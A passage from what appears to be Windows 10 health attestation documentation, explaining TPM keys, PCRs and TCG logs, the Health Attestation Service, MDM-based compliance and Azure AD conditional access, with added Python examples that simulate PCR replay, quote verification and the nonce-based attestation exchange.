Windows Health Attestation Service. Those components are described in this section.
Trusted Platform Module
This section describes how PCRs (which contain system configuration data), the endorsement key (EK) (which acts
as an identity card for the TPM), the SRK (which protects keys), and AIKs (which can report platform state) are
used for health attestation reporting.
In a simplified manner, the TPM is a passive component with limited resources. It can generate random numbers
and RSA keys, decrypt short data, and store hashes taken when booting the device.
A TPM incorporates in a single component:
An RSA 2048-bit key generator
A random number generator
Nonvolatile memory for storing EK, SRK, and AIK keys
A cryptographic engine to encrypt, decrypt, and sign
Volatile memory for storing the PCRs and RSA keys
Endorsement key
The TPM has an embedded unique cryptographic key called the endorsement key. The TPM endorsement key is a
pair of asymmetric keys (RSA size 2048 bits).
The endorsement key public key is generally used to securely send sensitive parameters, such as when taking
possession of the TPM that contains the defining hash of the owner password. The EK private key is used when
creating secondary keys like AIKs.
The endorsement key acts as an identity card for the TPM. For more information, see Understand the TPM
endorsement key.
The endorsement key is often accompanied by one or two digital certificates:
One certificate is produced by the TPM manufacturer and is called the endorsement certificate. The
endorsement certificate is used to prove the authenticity of the TPM (for example, that it’s a real TPM
manufactured by a specific chip maker) to local processes, applications, or cloud services. The endorsement
certificate is created during manufacturing or the first time the TPM is initialized by communicating with an
online service.
The other certificate is produced by the platform builder and is called the platform certificate to indicate that a
specific TPM is integrated with a certain device. For certain devices that use firmware-based TPM produced by
Intel or Qualcomm, the endorsement certificate is created when the TPM is initialized during the OOBE of
Windows 10.

Note: Secure Boot protects the platform until the Windows kernel is loaded. Then protections like Trusted
Boot, Hyper-V Code Integrity and ELAM take over. A device that uses Intel TPM or Qualcomm TPM gets a
signed certificate online from the manufacturer that has created the chip and then stores the signed certificate
in TPM storage. For the operation to succeed, if you are filtering Internet access from your client devices, you
must authorize the following URLs:

For Intel firmware TPM: https://ekop.intel.com/ekcertservice
For Qualcomm firmware TPM: https://ekcert.spserv.microsoft.com/
Attestation Identity Keys
Because the endorsement certificate is unique for each device and does not change, the usage of it may present
privacy concerns because it's theoretically possible to track a specific device. To avoid this privacy problem,
Windows 10 issues a derived attestation anchor based on the endorsement certificate. This intermediate key, which
can be attested to an endorsement key, is the Attestation Identity Key (AIK) and the corresponding certificate is
called the AIK certificate. This AIK certificate is issued by a Microsoft cloud service.

Note: Before the device can report its health using the TPM attestation functions, an AIK certificate must be
provisioned in conjunction with a third-party service like the Microsoft Cloud CA service. After it is
provisioned, the AIK private key can be used to report platform configuration. Windows 10 creates a signature
over the platform log state (and a monotonic counter value) at each boot by using the AIK.

The AIK is an asymmetric (public/private) key pair that is used as a substitute for the EK as an identity for the TPM
for privacy purposes. The private portion of an AIK is never revealed or used outside the TPM and can only be
used inside the TPM for a limited set of operations. Furthermore, it can only be used for signing, and only for
limited, TPM-defined operations.
Windows 10 creates AIKs protected by the TPM, if available, that are 2048-bit RSA signing keys. Microsoft is
hosting a cloud service called Microsoft Cloud CA to establish cryptographically that it is communicating with a
real TPM and that the TPM possesses the presented AIK. After the Microsoft Cloud CA service has established
these facts, it will issue an AIK certificate to the Windows 10-based device.
Many existing devices that will upgrade to Windows 10 will not have a TPM, or the TPM will not contain an
endorsement certificate. To accommodate those devices, Windows 10 allows the issuance of AIK
certificates without the presence of an endorsement certificate. Such AIK certificates are not issued by
Microsoft Cloud CA. Note that this is not as trustworthy as an endorsement certificate that is burned into the
device during manufacturing, but it will provide compatibility for advanced scenarios like Windows Hello for
Business without TPM.
In the issued AIK certificate, a special OID is added to attest that endorsement certificate was used during the
attestation process. This information can be leveraged by a relying party to decide whether to reject devices that
are attested using AIK certificates without an endorsement certificate or accept them. Another scenario can be to
not allow access to high-value assets from devices that are attested by an AIK certificate that is not backed by an
endorsement certificate.
Storage root key
The storage root key (SRK) is also an asymmetric key pair (RSA, minimum 2048-bit length). The SRK has
a major role and is used to protect TPM keys, so that these keys cannot be used without the TPM. The SRK key is
created when the ownership of the TPM is taken.
Platform Configuration Registers
The TPM contains a set of registers that are designed to provide a cryptographic representation of the software
and state of the system that booted. These registers are called Platform Configuration Registers (PCRs).
The measurement of the boot sequence is based on the PCRs and the TCG log. To establish a static root of trust,
when the device is starting, the device must be able to measure the firmware code before execution. In this case,
the Core Root of Trust for Measurement (CRTM) is executed at boot, calculates the hash of the firmware, stores
it by extending register PCR[0], and then transfers execution to the firmware.
PCRs are set to zero when the platform is booted, and it is the job of the firmware that boots the platform to
measure components in the boot chain and to record the measurements in the PCRs. Typically, boot components
take the hash of the next component that is to be run and record the measurements in the PCRs. The initial
component that starts the measurement chain is implicitly trusted. This is the CRTM. Platform manufacturers are
required to have a secure update process for the CRTM or not permit updates to it. The PCRs record a cumulative
hash of the components that have been measured.
The value of a PCR on its own is hard to interpret (it is just a hash value), but platforms typically keep a log with
details of what has been measured, and the PCRs merely ensure that the log has not been tampered with. The logs
are referred to as a TCG log. Each time a PCR is extended, an entry is added to the TCG log. Thus, throughout
the boot process, a trace of the executable code and configuration data is created in the TCG log.
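As an added illustration of the extend operation and of why the TCG log is needed to interpret a PCR (example code for this page, not part of any TPM library or of Windows; the component names and measured bytes are constructed), the following Python replays a single PCR from its log, shows that measuring the same components in a different order yields a different value, uses the PCR to detect an edited log, and uses the log to name the component whose measurement changed:

```python
import hashlib
from typing import List, Optional, Tuple

Event = Tuple[str, bytes]   # (component name, the bytes that were measured)


def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def extend(pcr: bytes, digest: bytes) -> bytes:
    """PCR := H(PCR || digest). A PCR only accumulates; it is never written directly."""
    return sha256(pcr + digest)


def replay(log: List[Event]) -> bytes:
    """Recompute one PCR from its log, starting from the zeroed power-on value."""
    pcr = bytes(32)
    for _, data in log:
        pcr = extend(pcr, sha256(data))
    return pcr


def verify_log(log: List[Event], quoted_pcr: bytes) -> bool:
    """The PCR is the integrity check on the log: a log that does not replay to the quoted value was edited."""
    return replay(log) == quoted_pcr


def first_divergence(baseline: List[Event], observed: List[Event]) -> Optional[str]:
    """For a log that passed verify_log but whose PCR differs from the golden value, name the
    first component whose measurement differs. Returns None when the logs are identical."""
    for (b_name, b_data), (o_name, o_data) in zip(baseline, observed):
        if b_name != o_name or sha256(b_data) != sha256(o_data):
            return o_name
    if len(observed) > len(baseline):
        return observed[len(baseline)][0]
    return "<truncated log>" if len(observed) < len(baseline) else None


# Constructed PCR[0]-style chain: the CRTM measures the firmware, which then measures what it loads.
BASELINE: List[Event] = [("firmware", b"uefi-fw-1.2"), ("uefi-driver:nvme", b"nvme-1.0"),
                         ("uefi-driver:net", b"net-2.1"), ("microcode", b"ucode-0x3a")]
GOLDEN_PCR = replay(BASELINE)


def scenario_reordered() -> bool:
    """Same components measured in a different order produce a different PCR value."""
    swapped = [BASELINE[0], BASELINE[2], BASELINE[1], BASELINE[3]]
    return replay(swapped) != GOLDEN_PCR


def scenario_modified_driver() -> Tuple[bool, Optional[str]]:
    """One changed driver: the log is internally consistent and the PCR differs from the golden
    value, and the log (not the PCR) tells the verifier which component changed."""
    observed = list(BASELINE)
    observed[2] = ("uefi-driver:net", b"net-2.1-patched")
    pcr = replay(observed)
    return verify_log(observed, pcr) and pcr != GOLDEN_PCR, first_divergence(BASELINE, observed)


def scenario_forged_log() -> bool:
    """The device really booted the modified driver but reports the clean log: replay fails."""
    actual = list(BASELINE)
    actual[2] = ("uefi-driver:net", b"net-2.1-patched")
    quoted_pcr = replay(actual)          # what the TPM would report in its quote
    return not verify_log(BASELINE, quoted_pcr)


if __name__ == "__main__":
    print("order matters:", scenario_reordered())
    print("modified driver detected, changed component:", scenario_modified_driver())
    print("forged log detected:", scenario_forged_log())
```

The pairing is the key property: the log is informative but unprotected, the PCR is protected but opaque, and a verifier needs both, replaying the log to the PCR before believing any detail in it.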
TPM provisioning
For the TPM of a Windows 10-based device to be usable, it must first be provisioned. The process of provisioning
differs somewhat between TPM versions, but, when successful, it results in the TPM being usable and the owner
authorization data (ownerAuth) for the TPM being stored locally in the registry.
When the TPM is provisioned, Windows 10 will first attempt to determine the EK and locally stored ownerAuth
values by looking in the registry at the following location:
HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\Endorsement
During the provisioning process, the device may need to be restarted.
Note that the Get-TpmEndorsementKeyInfo PowerShell cmdlet can be used with administrative privilege to get
information about the endorsement key and certificates of the TPM.
If the TPM ownership is not known but the EK exists, the client library provisions the TPM, stores the resulting
ownerAuth value in the registry (if policy allows it), and stores the SRK public portion at the following location:
HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\Admin\SRKPub
As part of the provisioning process, Windows 10 will create an AIK with the TPM. When this operation is
performed, the resulting AIK public portion is stored in the registry at the following location:
HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI\WindowsAIKPub

Note: For provisioning AIK certificates and filtering Internet access, you must authorize the following wildcard
URL: https://*.microsoftaik.azure.net

Windows 10 Health Attestation CSP


Windows 10 contains a configuration service provider (CSP) specialized for interacting with the health attestation
feature. A CSP is a component that plugs into the Windows MDM client and provides a published protocol for how
MDM servers can configure settings and manage Windows-based devices. The management protocol is
represented as a tree structure that can be specified as URIs with functions to perform on the URIs such as "get",
"set", "delete", and so on.
The following is a list of functions performed by the Windows 10 Health Attestation CSP:
Collects data that is used to verify a device’s health status
Forwards the data to the Health Attestation Service
Provisions the Health Attestation Certificate that it receives from the Health Attestation Service
Upon request, forwards the Health Attestation Certificate (received from the Health Attestation Service) and
related runtime information to the MDM server for verification
During a health attestation session, the Health Attestation CSP forwards the TCG logs and PCRs values that are
measured during the boot, by using a secure communication channel to the Health Attestation Service.
When an MDM server validates that a device has attested to the Health Attestation Service, it will be given a set of
statements and claims about how that device booted, with the assurance that the device did not reboot between the
time that it attested its health and the time that the MDM server validated it.
Windows Health Attestation Service
The role of Windows Health Attestation Service is essentially to evaluate a set of health data (TCG log and PCR
values), make a series of detections (based on available health data) and generate encrypted health blob or produce
report to MDM servers.

Note: Both the device and the MDM server must have access to has.spserv.microsoft.com using the TCP protocol
on port 443 (HTTPS).

Checking that a TPM attestation and the associated log are valid takes several steps:
1. First, the server must check that the reports are signed by a trustworthy AIK. This can be done by checking
that the public part of the AIK is listed in a database of known assets, or by validating the AIK's certificate chain.
2. After the key has been checked, the signed attestation (a quote structure) should be checked to see whether it is
a valid signature over PCR values.
3. Next the logs should be checked to ensure that they match the PCR values reported.
4. Finally, the logs themselves should be examined by an MDM solution to see whether they represent known or
valid security configurations. For example, a simple check might be to see whether the measured early OS
components are known to be good, that the ELAM driver is as expected, and that the ELAM driver policy file is
up to date. If all of these checks succeed, an attestation statement can be issued that later can be used to
determine whether or not the client should be granted access to a resource.
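The PCR extend operation described under Platform Configuration Registers and the four verification steps above, as an added worked example. This is not the Health Attestation Service's code: the TCG-style event log, the "known good" policy digests and the AIK identifier are all constructed for the example, the PCR bank is SHA-256, and because the Python standard library has no asymmetric signatures, an HMAC under a per-AIK secret stands in for the RSA/ECC signature a real AIK produces over a TPM quote. The verifier replays the log into PCR values, compares them with the quoted values, and only then applies policy to the log contents.

```python
"""Replay a TCG-style event log into PCR values and validate a TPM quote against it."""
import hashlib
import hmac


def measure(data: bytes) -> bytes:
    """Hash of an object being measured (the digest that gets extended into a PCR)."""
    return hashlib.sha256(data).digest()


# Constructed sample log in the shape of a TCG event log: (PCR index, event type,
# description, digest of the measured object). The measured data is made up.
SAMPLE_LOG = [
    (0, "EV_S_CRTM_VERSION", "CRTM version", measure(b"CRTM v1.2")),
    (0, "EV_POST_CODE", "UEFI firmware image", measure(b"firmware-build-2019.04")),
    (7, "EV_EFI_VARIABLE_DRIVER_CONFIG", "SecureBoot", measure(b"SecureBoot\x01")),
    (14, "EV_EVENT_TAG", "ELAM driver", measure(b"WdBoot.sys 4.18")),
]

# Policy for step 4 (constructed): the digest each measured object must have on a healthy device.
KNOWN_GOOD = {
    "UEFI firmware image": measure(b"firmware-build-2019.04"),
    "SecureBoot": measure(b"SecureBoot\x01"),  # variable value 1 = Secure Boot enabled
    "ELAM driver": measure(b"WdBoot.sys 4.18"),
}

# Stand-in for the AIK: a real quote is an RSA/ECC signature by the AIK private key.
# An HMAC under a per-AIK secret plays that role here so the block runs offline.
AIK_ALLOWLIST = {"aik-device-001": measure(b"constructed AIK secret")}


def pcr_extend(current: bytes, measurement: bytes) -> bytes:
    """TPM extend operation: PCR <- H(PCR || measurement). PCRs start as all zeros."""
    return measure(current + measurement)


def replay_log(log):
    """Rebuild every PCR the log touches by extending from zero, in log order."""
    pcrs = {}
    for index, _etype, _desc, digest in log:
        pcrs[index] = pcr_extend(pcrs.get(index, bytes(32)), digest)
    return pcrs


def quote_body(pcrs, nonce):
    """Canonical bytes covered by the quote: nonce, then (index, value) in index order."""
    return nonce + b"".join(bytes([i]) + pcrs[i] for i in sorted(pcrs))


def make_quote(aik_id, pcrs, nonce):
    """Device side: quote the current PCR values together with the verifier's nonce."""
    sig = hmac.new(AIK_ALLOWLIST[aik_id], quote_body(pcrs, nonce), "sha256").digest()
    return {"aik_id": aik_id, "pcrs": dict(pcrs), "nonce": nonce, "sig": sig}


def verify_attestation(quote, log, expected_nonce, allowlist=AIK_ALLOWLIST, known_good=KNOWN_GOOD):
    """Verifier side, following the four steps in the text. Returns (ok, reasons)."""
    # Step 1: the quote must come from an AIK we trust (here: an allowlist keyed by ID).
    key = allowlist.get(quote["aik_id"])
    if key is None:
        return False, ["AIK is not trusted"]
    # Step 2: the signature must verify over the PCR values, and the nonce must be ours.
    expected_sig = hmac.new(key, quote_body(quote["pcrs"], quote["nonce"]), "sha256").digest()
    if not hmac.compare_digest(expected_sig, quote["sig"]):
        return False, ["quote signature is invalid"]
    if quote["nonce"] != expected_nonce:
        return False, ["quote is stale: nonce mismatch"]
    # Step 3: the log must replay to exactly the quoted PCR values, otherwise it was edited.
    replayed = replay_log(log)
    reasons = [f"PCR{i}: log does not replay to the quoted value"
               for i, value in sorted(quote["pcrs"].items()) if replayed.get(i) != value]
    if reasons:
        return False, reasons
    # Step 4: with the log now trusted, check the measured objects against policy.
    measured = {desc: digest for _, _, desc, digest in log}
    reasons = [f"{desc}: missing or unexpected measurement"
               for desc, good in known_good.items() if measured.get(desc) != good]
    return not reasons, reasons
```

Two failure modes are worth trying: a log edited after the fact (the quoted PCR no longer replays, so step 3 fails before any policy is consulted) and an honest log from a device that booted with Secure Boot off (steps 1 to 3 pass and only step 4 reports the problem). Both look like "unhealthy" to the relying party, but only the first indicates tampering.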
The Health Attestation Service provides the following information to an MDM solution about the health of the
device:
Secure Boot enablement
Boot and kernel debug enablement
BitLocker enablement
VSM enabled
Signed or unsigned Device Guard Code Integrity policy measurement
ELAM loaded
Safe Mode boot, DEP enablement, test signing enablement
Device TPM has been provisioned with a trusted endorsement certificate
For completeness of the measurements, see Health Attestation CSP.
The following table presents some key items that can be reported back to MDM depending on the type of
Windows 10-based device.

OS TYPE                            KEY ITEMS THAT CAN BE REPORTED

Windows 10 Mobile                  PCR0 measurement
                                   Secure Boot enabled
                                   Secure Boot db is default
                                   Secure Boot dbx is up to date
                                   Secure Boot policy GUID is default
                                   Device Encryption enabled
                                   Code Integrity revocation list timestamp/version is up to date

Windows 10 for desktop editions    PCR0 measurement
                                   Secure Boot enabled
                                   Secure Boot db matches expected
                                   Secure Boot dbx is up to date
                                   Secure Boot policy GUID matches expected
                                   BitLocker enabled
                                   Virtualization-based security enabled
                                   ELAM was loaded
                                   Code Integrity version is up to date
                                   Code Integrity policy hash matches expected

Leverage MDM and the Health Attestation Service


To make device health relevant, the MDM solution evaluates the device health report and is configured to the
organization’s device health requirements.
A solution that leverages MDM and the Health Attestation Service consists of three main parts:
1. A device with health attestation enabled. This will usually be done as a part of enrollment with an MDM
provider (health attestation will be disabled by default).
2. After this is enabled, and every boot thereafter, the device will send health measurements to the Health
Attestation Service hosted by Microsoft, and it will receive a health attestation blob in return.
3. At any point after this, an MDM server can request the health attestation blob from the device and ask Health
Attestation Service to decrypt the content and validate that it’s been attested.
Interaction between a Windows 10-based device, the Health Attestation Service, and MDM can be performed as
follows:
1. The client initiates a session with the MDM server. The URI for the MDM server would be part of the client app
that initiates the request. The MDM server at this time could request the health attestation data by using the
appropriate CSP URI.
2. The MDM server specifies a nonce along with the request.
3. The client then sends the AIK quoted nonce + the boot counter and the health blob information. This health
blob is encrypted with a Health Attestation Service public key that only the Health Attestation Service can
decrypt.
4. The MDM server:
a. Verifies that the nonce is as expected.
b. Passes the quoted data, the nonce and the encrypted health blob to the Health Attestation Service server.
5. The Health Attestation Service:
a. Decrypts the health blob.
b. Verifies that the boot counter in the quote is correct using the AIK in the health blob and matches the
value in the health blob.
c. Verifies that the nonce matches in the quote and the one that is passed from MDM.
d. Because the boot counter and the nonce are quoted with the AIK from the health blob, it also proves that
the device is the same one as the one for which the health blob has been generated.
e. Sends data back to the MDM server including health parameters, freshness, and so on.

Note: The MDM server (relying party) never performs the quote or boot counter validation itself. It gets the
quoted data and the health blob (which is encrypted) and sends the data to the Health Attestation Service for
validation. This way, the AIK is never visible to the MDM, which thereby addresses privacy concerns.

Setting the requirements for device compliance is the first step to ensure that registered devices that do not meet
health and compliance requirements are detected, tracked, and have actions enforced by the MDM solution.
Devices that attempt to connect to resources must have their health evaluated so that unhealthy and noncompliant
devices can be detected and reported. To be fully efficient, an end-to-end security solution must impose a
consequence for unhealthy devices like refusing access to high-value assets. That is the purpose of conditional
access control, which is detailed in the next section.
Control the security of a Windows 10-based device before access is granted
Today’s access control technology, in most cases, focuses on ensuring that the right people get access to the right
resources. If users can authenticate, they get access to resources using a device that the organization’s IT staff and
systems know very little about. Perhaps there is some check such as ensuring that a device is encrypted before
giving access to email, but what if the device is infected with malware?
The remote device health attestation process uses measured boot data to verify the health status of the device. The
health of the device is then available for an MDM solution like Intune.

Note: For the latest information on Intune and Windows 10 features support, see the Microsoft Intune blog
and What's new in Microsoft Intune.

The figure below shows how the Health Attestation Service is expected to work with Microsoft’s cloud-based
Intune MDM service.

An MDM solution can then leverage health state statements and take them to the next level by coupling with client
policies that will enable conditional access to be granted based on the device’s ability to prove that it’s malware
free, its antimalware system is functional and up to date, the firewall is running, and the devices patch state is
compliant.
Finally, resources can be protected by denying access to endpoints that are unable to prove they’re healthy. This
feature is much needed for BYOD devices that need to access organizational resources.
Built-in support of MDM in Windows 10
Windows 10 has an MDM client that ships as part of the operating system. This enables MDM servers to manage
Windows 10-based devices without requiring a separate agent.
Third-party MDM server support
Third-party MDM servers can manage Windows 10 by using the MDM protocol. The built-in management client is
able to communicate with a compatible server that supports the OMA-DM protocol to perform enterprise
management tasks. For additional information, see Azure Active Directory integration with MDM.

Note: MDM servers do not need to create or download a client to manage Windows 10. For more
information, see Mobile device management.

The third-party MDM server will have the same consistent first-party user experience for enrollment, which also
provides simplicity for Windows 10 users.
Management of Windows Defender by third-party MDM
This management infrastructure makes it possible for IT pros to use MDM-capable products like Intune to manage
health attestation, Device Guard, or Windows Defender on Windows 10-based devices, including BYODs that
aren't domain joined. IT pros will be able to manage and configure all of the actions and settings they are familiar
with customizing by using Intune with Intune Endpoint Protection on down-level operating systems. Admins that
currently only manage domain joined devices through Group Policy will find it easy to transition to managing
Windows 10-based devices by using MDM because many of the settings and actions are shared across both
mechanisms.
For more information on how to manage Windows 10 security and system settings with an MDM solution, see
Custom URI settings for Windows 10 devices.
Conditional access control
On most platforms, the Azure Active Directory (Azure AD) device registration happens automatically during
enrollment. The device states are written by the MDM solution into Azure AD, and then read by Office 365 (or by
any authorized Windows app that interacts with Azure AD) the next time the client tries to access an Office 365
compatible workload.
If the device is not registered, the user will get a message with instructions on how to register (also known as
enrolling). If the device is not compliant, the user will get a different message that redirects them to the MDM web
portal where they can get more information on the compliance problem and how to resolve it.
Azure AD authenticates the user and the device, MDM manages the compliance and conditional access policies,
and the Health Attestation Service reports about the health of the device in an attested way.

Office 365 conditional access control


Azure AD enforces conditional access policies to secure access to Office 365 services. A tenant admin can create a
conditional access policy that blocks a user on a non-compliant device from accessing an Office 365 service. The
user must conform to the company’s device policies before access can be granted to the service. Alternately, the
admin can also create a policy that requires users to just enroll their devices to gain access to an Office 365 service.
Policies may be applied to all users of an organization, or limited to a few target groups and enhanced over time to
include additional target groups.
When a user requests access to an Office 365 service from a supported device platform, Azure AD authenticates
the user and device from which the user launches the request; and grants access to the service only when the user
conforms to the policy set for the service. Users that do not have their device enrolled are given remediation
instructions on how to enroll and become compliant to access corporate Office 365 services.
When a user enrolls, the device is registered with Azure AD, and enrolled with a compatible MDM solution like
Intune.

Note: Microsoft is working with third-party MDM ISVs to support automated MDM enrollment and policy
based access checks. Steps to turn on auto-MDM enrollment with Azure AD and Intune are explained in the
Windows 10, Azure AD And Microsoft Intune: Automatic MDM Enrollment Powered By The Cloud! blog post.

When a user enrolls a device successfully, the device becomes trusted. Azure AD provides single-sign-on to access
company applications and enforces conditional access policy to grant access to a service not only the first time the
user requests access, but every time the user requests to renew access.
The user will be denied access to services when sign-in credentials are changed, a device is lost/stolen, or the
compliance policy is not met at the time of request for renewal.
Depending on the type of email application that employees use to access Exchange online, the path to establish
secured access to email can be slightly different. However, the key components: Azure AD, Office 365/Exchange
Online, and Intune, are the same. The IT experience and end-user experience also are similar.

Clients that attempt to access Office 365 will be evaluated for the following properties:
Is the device managed by an MDM?
Is the device registered with Azure AD?
Is the device compliant?
To get to a compliant state, the Windows 10-based device needs to:
Enroll with an MDM solution.
Register with Azure AD.
Be compliant with the device policies set by the MDM solution.
Note: At the present time, conditional access policies are selectively enforced on users on iOS and Android
devices. For more information, see the Azure AD, Microsoft Intune and Windows 10 – Using the cloud to
modernize enterprise mobility! blog post.

Cloud and on-premises apps conditional access control


Conditional access control is a powerful policy evaluation engine built into Azure AD. It gives IT pros an easy way
to create access rules beyond Office 365 that evaluate the context of a user's logon to make real-time decisions
about which applications they should be allowed to access.
IT pros can configure conditional access control policies for cloud SaaS applications secured by Azure AD and even
on-premises applications. Access rules in Azure AD leverage the conditional access engine to check device health
and compliance state reported by a compatible MDM solution like Intune in order to determine whether to allow
access.
For more information about conditional access, see Azure Conditional Access Preview for SaaS Apps.

Note: Conditional access control is an Azure AD Premium feature that's also available with EMS. If you don't
have an Azure AD Premium subscription, you can get a trial from the Microsoft Azure site.

For on-premises applications there are two options to enable conditional access control based on a device's
compliance state:
For on-premises applications that are published through the Azure AD Application Proxy, you can configure
conditional access control policies as you would for cloud applications. For more details, see the Azure AD
Conditional Access preview updated: Now supports On-Premises and Custom LOB apps blog post.
Additionally, Azure AD Connect will sync device compliance information from Azure AD to on-premises AD.
ADFS on Windows Server 2016 will support conditional access control based on a device's compliance state. IT
pros will configure conditional access control policies in ADFS that use the device's compliance state reported
by a compatible MDM solution to secure on-premises applications.

The following process describes how Azure AD conditional access works:


1. The user has already enrolled with MDM through Workplace Access or Azure AD join, which registers the device
with Azure AD.
2. When the device boots or resumes from hibernate, a task “Tpm-HASCertRetr” is triggered to request in
background a health attestation blob. Device sends TPM boot measurements to the Health Attestation Service.
3. Health Attestation Service validates device state and issues an encrypted blob to the device based on the health
state with details on failed checks (if any).
4. User logs on and the MDM agent contacts the Intune/MDM server.
5. MDM server pushes down new policies if available and queries health blob state and other inventory state.
6. Device sends a health attestation blob previously acquired and also the value of the other state inventory
requested by the Intune/MDM server.
7. Intune/MDM server sends the health attestation blob to Health Attestation Service to be validated.
8. Health Attestation Service validates that the device which sent the health attestation blob is healthy, and returns
this result to Intune/MDM server.
9. Intune/MDM server evaluates compliance based on the compliance and the queried inventory/health
attestation state from device.
10. Intune/MDM server updates compliance state against device object in Azure AD.
11. User opens app, attempts to access a corporate managed asset.
12. Access gated by compliance claim in Azure AD.
13. If the device is compliant and the user is authorized, an access token is generated.
14. User can access the corporate managed asset.
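The device, MDM and Health Attestation Service exchange from the five-step flow under "Leverage MDM and the Health Attestation Service" and the 14-step process above, as an added example of the relying-party logic. This is example code, not Intune's or the Health Attestation Service's. It assumes stand-ins that keep it runnable with the Python standard library: a real health blob is encrypted to the HAS public key, here the HAS only seals it with an HMAC under a key the MDM does not have; a real quote is an AIK signature over nonce and boot counter, here an HMAC under a per-AIK secret; and the health claims are constructed from the desktop-edition report items in the table above. The MDM never opens the blob or touches the AIK, and it treats each nonce as single use, so replaying an earlier response fails.

```python
"""Device <-> MDM <-> Health Attestation Service (HAS) exchange with nonce and boot counter."""
import hashlib
import hmac
import json
import secrets

# Constructed stand-ins (see lead-in): HMAC keys in place of HAS encryption and AIK signatures.
HAS_SECRET = hashlib.sha256(b"constructed HAS sealing key").digest()
AIK_KEYS = {"aik-device-001": hashlib.sha256(b"constructed AIK secret").digest()}


def tag(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, "sha256").digest()


def has_issue_blob(aik_id, boot_counter, health):
    """HAS, at boot (steps 2-3): evaluate measurements and seal the result into an opaque blob.
    The blob binds the health claims to the AIK and to the boot in which they were measured."""
    body = json.dumps({"aik_id": aik_id, "boot_counter": boot_counter, "health": health},
                      sort_keys=True).encode()
    return body + tag(HAS_SECRET, body)


def device_respond(aik_id, blob, nonce, boot_counter):
    """Device (step 3 of the short flow / step 6 of the long one): AIK-quote the MDM's nonce
    and the current boot counter, and hand back the blob the HAS issued at boot."""
    quote = {"nonce": nonce, "boot_counter": boot_counter,
             "sig": tag(AIK_KEYS[aik_id], nonce + boot_counter.to_bytes(8, "big"))}
    return {"quote": quote, "blob": blob}


def has_validate(quote, nonce, blob):
    """HAS (steps 5a-5e / step 8): open the blob, check the quote against the AIK in the blob,
    and confirm the device has not rebooted since the blob was issued."""
    body, seal = blob[:-32], blob[-32:]
    if not hmac.compare_digest(seal, tag(HAS_SECRET, body)):
        return {"valid": False, "reason": "blob was not issued by the HAS"}
    inner = json.loads(body)
    # A real blob carries the AIK public key; the stand-in looks the AIK secret up by ID.
    expected = tag(AIK_KEYS[inner["aik_id"]], quote["nonce"] + quote["boot_counter"].to_bytes(8, "big"))
    if not hmac.compare_digest(expected, quote["sig"]):
        return {"valid": False, "reason": "quote is not signed by the AIK in the blob"}
    if quote["nonce"] != nonce:
        return {"valid": False, "reason": "nonce in the quote does not match the MDM's nonce"}
    if quote["boot_counter"] != inner["boot_counter"]:
        return {"valid": False, "reason": "device rebooted since the blob was issued"}
    return {"valid": True, "health": inner["health"]}


class MdmServer:
    """Relying party: issues nonces, forwards evidence to the HAS, evaluates compliance."""

    def __init__(self, policy):
        self.policy = policy          # required health values, e.g. {"bitlocker": True}
        self.outstanding = set()      # nonces issued and not yet consumed

    def challenge(self):
        """Step 2: a fresh random nonce per request, remembered so it can be used only once."""
        nonce = secrets.token_bytes(16)
        self.outstanding.add(nonce)
        return nonce

    def validate(self, response):
        """Steps 4a-4b and 9: check our own nonce, defer quote and AIK checks to the HAS,
        then compare the returned health claims against policy."""
        nonce = response["quote"]["nonce"]
        if nonce not in self.outstanding:
            return {"compliant": False, "reason": "unknown or reused nonce"}
        self.outstanding.discard(nonce)  # single use: replaying this response fails below
        report = has_validate(response["quote"], nonce, response["blob"])
        if not report["valid"]:
            return {"compliant": False, "reason": report["reason"]}
        failed = [k for k, want in self.policy.items() if report["health"].get(k) != want]
        return {"compliant": not failed, "failed": failed}
```

The boot counter is what ties the two halves together: the blob was issued for one boot, the quote proves which boot the device is in now, and the AIK signature over nonce and boot counter is what stops a healthy blob from being replayed after a reboot into an unhealthy state.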
For more information about Azure AD join, see the Azure AD & Windows 10: Better Together for Work or School
white paper.
Conditional access control is a topic that many organizations and IT pros may not know as well as they should. The
different attributes that describe a user, a device, compliance, and context of access are very powerful when used
with a conditional access engine. Conditional access control is an essential step that helps organizations secure
their environment.

Takeaways and summary


The following list contains high-level key take-aways to improve the security posture of any organization. However,
the few take-aways presented in this section should not be interpreted as an exhaustive list of security best
practices.
Understand that no solution is 100 percent secure
If determined adversaries with malicious intent gain physical access to the device, they could eventually
break through its security layers and control it.
Use health attestation with an MDM solution
Devices that attempt to connect to high-value assets must have their health evaluated so that unhealthy and
noncompliant devices can be detected, reported, and eventually blocked.
Use Credential Guard
Credential Guard is a feature that greatly helps protect corporate domain credentials from pass-the-hash
attacks.
Use Device Guard
Device Guard is a real advance in security and an effective way to help protect against malware. The new
Device Guard feature in Windows 10 blocks untrusted apps (apps not authorized by your organization).
Sign Device Guard policy
A signed Device Guard policy helps protect against a user with administrator privileges trying to defeat the
current policy. When a policy is signed, the only way to modify Device Guard subsequently is to provide a
new version of the policy signed by the same signer, or by a signer specified as part of the Device Guard
policy.
Use virtualization-based security
When you have Kernel Mode Code Integrity protected by virtualization-based security, the code integrity
rules are still enforced even if a vulnerability allows unauthorized kernel mode memory access. Keep in mind
that Device Guard devices that run Kernel Code Integrity with virtualization-based security must have
compatible drivers.
Start to deploy Device Guard with Audit mode
Deploy Device Guard policy to targeted computers and devices in Audit mode. Monitor the Code Integrity
event log that indicates a program or a driver would have been blocked if Device Guard was configured in
Enforcement mode. Adjust Device Guard rules until a high level of confidence has been reached. After the
testing phase has been completed, Device Guard policy can be switched to Enforcement mode.
Build an isolated reference machine when deploying Device Guard
Because the corporate network can contain malware, you should start to configure a reference environment
that is isolated from your main corporate network. After that, you can create a code integrity policy that
includes the trusted applications you want to run on your protected devices.
Use AppLocker when it makes sense
Although AppLocker is not considered a new Device Guard feature, it complements Device Guard
functionality for some scenarios, such as denying a specific Universal Windows app to a specific user
or group of users.
Lock down firmware and configuration
After Windows 10 is installed, lock down firmware boot options access. This prevents a user with physical
access from modifying UEFI settings, disabling Secure Boot, or booting other operating systems. Also, in
order to protect against an administrator trying to disable Device Guard, add a rule in the current Device
Guard policy that will deny and block execution of the C:\Windows\System32\SecConfig.efi tool.
Health attestation is a key feature of Windows 10 that includes client and cloud components to control access to
high-value assets based on a user and their device’s identity and compliance with corporate governance policy.
Organizations can choose to detect and report unhealthy devices, or to configure health enforcement rules based
